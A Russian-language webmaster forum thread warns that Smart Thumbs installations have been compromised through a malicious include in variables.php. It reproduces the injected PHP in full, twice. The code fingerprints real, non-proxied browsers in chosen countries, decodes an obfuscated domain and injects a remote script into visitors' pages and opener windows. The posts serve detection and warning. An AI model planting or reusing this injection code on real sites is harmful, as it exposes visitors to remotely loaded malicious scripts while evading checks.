📈sflash.biz
С нами с 03.11.12
Сообщения: 3913
Рейтинг: 4447
|
Добавлено: 15/10/13 в 12:27 |
Для мамонтов вроде меня, кто ещё юзает Smart Thumbs, советую проверить /st/admin/variables.php на предмет разного рода несанкционированых инклудов. У меня стояли последние версии: 5.83.
Первый клик по тумбе на сайте вставляет вредоносный код. Отлавливается KIS-ом или можно увидеть в хедерах при первом клике по тумбе (смотрите вторую строку в хедерах). Все последующие клики, заходы на сайт уже ничего оне показывают, ловить надо на свежую.
|
|
|
|
С нами с 28.01.06
Сообщения: 380
Рейтинг: 588
|
Добавлено: 15/10/13 в 14:27 |
Было бы неплохо засветить код что был в variables.php
что бы знать хоть примерно что искать
|
|
|
|
📈sflash.biz
С нами с 03.11.12
Сообщения: 3913
Рейтинг: 4447
|
Добавлено: 15/10/13 в 14:33 |
Код может отличаться. Тут могу быть разные имена файлов инклуда:
$bookmark_enabled=0;@include_once('/tmp/qcq');
В qcq такое содержание (cразу подготовленное для DTR и SCJ помимо ST):
Код: [развернуть] | $qout=($qout)?$qout:'(/out.php|/st/st.php|/scj/cgi/out.php|/dtr/link.php)';
if(!$_COOKIE['qc'] && ((!$_SERVER['HTTP_X_REAL_IP'] && preg_match("%keep-alive%i", $_SERVER['HTTP_CONNECTION'])) || $_SERVER['HTTP_X_REAL_IP']) && $_SERVER['HTTP_USER_AGENT'] && !preg_match("%bot%i",$_SERVER['HTTP_USER_AGENT']) && preg_match("%(msie|chrome|firefox)%i",$_SERVER['HTTP_USER_AGENT']) && $_SERVER['HTTP_ACCEPT_LANGUAGE'] && !$_SERVER['HTTP_X_FORWARDED_FOR'] && !$_SERVER['HTTP_X_FORWARDED'] && !$_SERVER['HTTP_FORWARDED_FOR'] && !$_SERVER['HTTP_FORWARDED'] && !$_SERVER['HTTP_VIA'] && !$_SERVER['HTTP_X_COMING_FROM'] && !$_SERVER['HTTP_COMING_FROM'] && !$_SERVER['HTTP_CLIENT_IP'] && !$_SERVER['HTTP_PROXY_USER'] && !$_SERVER['HTTP_PROXY_CONNECTION'] && (($_SERVER['GEOIP_COUNTRY_CODE'] && preg_match("%(US|CA|AU|GB|DE|DK|FR|SE|CH|NL|IT|BE|AT|ES|NO|IE|FI|NZ)%", $_SERVER['GEOIP_COUNTRY_CODE'])) || ($_SERVER['HTTP_ACCEPT_LANGUAGE'] && preg_match("%(en|de|da|fr|sv|it|es|nl|no|fi)%i", $_SERVER['HTTP_ACCEPT_LANGUAGE'])))){
error_reporting(0);$qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109);
if($qi && $_SERVER['HTTP_REFERER'] && !preg_match("%{$_SERVER['HTTP_HOST']}%i", $_SERVER['HTTP_REFERER'])){echo "<script src='http://{$qd}/'></script>";}
elseif (is_array($_COOKIE) && $_SERVER['HTTP_REFERER'] && preg_match("%{$_SERVER['HTTP_HOST']}%i", $_SERVER['HTTP_REFERER']) && preg_match("%$qout%i", $_SERVER['SCRIPT_NAME'])){header("Set-Cookie: qc=1; path=/; expires=". gmdate('D, d-M-Y H:i:s', time()+604800) ." GMT;");echo "<html><body><script>var wo=window.opener.document.createElement('script');wo.src='http://{$qd}/?1';window.opener.document.body.appendChild(wo);window.name='_blanq';window.location.reload();</script><body></html>";exit();}
}
?> |
|
|
|
|
С нами с 28.02.12
Сообщения: 651
Рейтинг: 571
|
Добавлено: 15/10/13 в 15:40 |
S_Flash писал: | Код может отличаться. Тут могу быть разные имена файлов инклуда:
$bookmark_enabled=0;@include_once('/tmp/qcq');
В qcq такое содержание (cразу подготовленное для DTR и SCJ помимо ST):
Код: [развернуть] | $qout=($qout)?$qout:'(/out.php|/st/st.php|/scj/cgi/out.php|/dtr/link.php)';
if(!$_COOKIE['qc'] && ((!$_SERVER['HTTP_X_REAL_IP'] && preg_match("%keep-alive%i", $_SERVER['HTTP_CONNECTION'])) || $_SERVER['HTTP_X_REAL_IP']) && $_SERVER['HTTP_USER_AGENT'] && !preg_match("%bot%i",$_SERVER['HTTP_USER_AGENT']) && preg_match("%(msie|chrome|firefox)%i",$_SERVER['HTTP_USER_AGENT']) && $_SERVER['HTTP_ACCEPT_LANGUAGE'] && !$_SERVER['HTTP_X_FORWARDED_FOR'] && !$_SERVER['HTTP_X_FORWARDED'] && !$_SERVER['HTTP_FORWARDED_FOR'] && !$_SERVER['HTTP_FORWARDED'] && !$_SERVER['HTTP_VIA'] && !$_SERVER['HTTP_X_COMING_FROM'] && !$_SERVER['HTTP_COMING_FROM'] && !$_SERVER['HTTP_CLIENT_IP'] && !$_SERVER['HTTP_PROXY_USER'] && !$_SERVER['HTTP_PROXY_CONNECTION'] && (($_SERVER['GEOIP_COUNTRY_CODE'] && preg_match("%(US|CA|AU|GB|DE|DK|FR|SE|CH|NL|IT|BE|AT|ES|NO|IE|FI|NZ)%", $_SERVER['GEOIP_COUNTRY_CODE'])) || ($_SERVER['HTTP_ACCEPT_LANGUAGE'] && preg_match("%(en|de|da|fr|sv|it|es|nl|no|fi)%i", $_SERVER['HTTP_ACCEPT_LANGUAGE'])))){
error_reporting(0);$qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109);
if($qi && $_SERVER['HTTP_REFERER'] && !preg_match("%{$_SERVER['HTTP_HOST']}%i", $_SERVER['HTTP_REFERER'])){echo "<script src='http://{$qd}/'></script>";}
elseif (is_array($_COOKIE) && $_SERVER['HTTP_REFERER'] && preg_match("%{$_SERVER['HTTP_HOST']}%i", $_SERVER['HTTP_REFERER']) && preg_match("%$qout%i", $_SERVER['SCRIPT_NAME'])){header("Set-Cookie: qc=1; path=/; expires=". gmdate('D, d-M-Y H:i:s', time()+604800) ." GMT;");echo "<html><body><script>var wo=window.opener.document.createElement('script');wo.src='http://{$qd}/?1';window.opener.document.body.appendChild(wo);window.name='_blanq';window.location.reload();</script><body></html>";exit();}
}
?> | |
и смартсж поломали?
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 15/10/13 в 17:20 |
Каково действие кода? Редиректит куда траф или что-то еще?
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
|
📈sflash.biz
С нами с 03.11.12
Сообщения: 3913
Рейтинг: 4447
|
Добавлено: 15/10/13 в 20:10 |
Скорее загружает что-то. Есть разница?
Вот урл, смотри, что он делает
$qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109);
|
|
|
|
@JustCallMeGuru
С нами с 22.03.09
Сообщения: 1688
Рейтинг: 1325
|
Добавлено: 29/10/13 в 12:04 |
Както Смарт Тумбс вяло следит и реагирует за своими уязвимостями.
|
|
|
|
@JustCallMeGuru
С нами с 22.03.09
Сообщения: 1688
Рейтинг: 1325
|
Добавлено: 29/10/13 в 12:06 |
Както Смарт Тумбс вяло следит и реагирует за своими уязвимостями.
|
|
|
|
С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843
|
Добавлено: 12/11/13 в 00:22 |
S_Flash писал: | Скорее загружает что-то. Есть разница?
Вот урл, смотри, что он делает
$qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109); |
кто-нибудь изучал вопрос детальнее?
откуда ноги растут у этой дряни? уже который год.
|
|
|
|
.:GLX Group:.
С нами с 17.05.07
Сообщения: 693
Рейтинг: 752
|
Добавлено: 12/11/13 в 09:26 |
S_Flash писал: | Скорее загружает что-то. Есть разница?
Вот урл, смотри, что он делает
$qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109); |
Код: [развернуть] |
$qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109);
Равно
$qd=iwnec.com;
|
|
|
|
|